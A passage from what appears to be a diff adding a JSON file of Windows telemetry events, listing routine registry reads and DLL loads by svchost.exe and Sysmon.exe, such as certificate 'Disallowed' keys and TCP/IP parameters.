"C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + 
"registry_value": "Parameters", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "rasadhlp.dll", + "image_path": "C:\\Windows\\System32\\rasadhlp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880430000, + "unique_pid": 
"{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880430000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"image_load", + "image_name": "iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + 
"timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880580000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sxs.dll", + "image_path": "C:\\Windows\\System32\\sxs.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 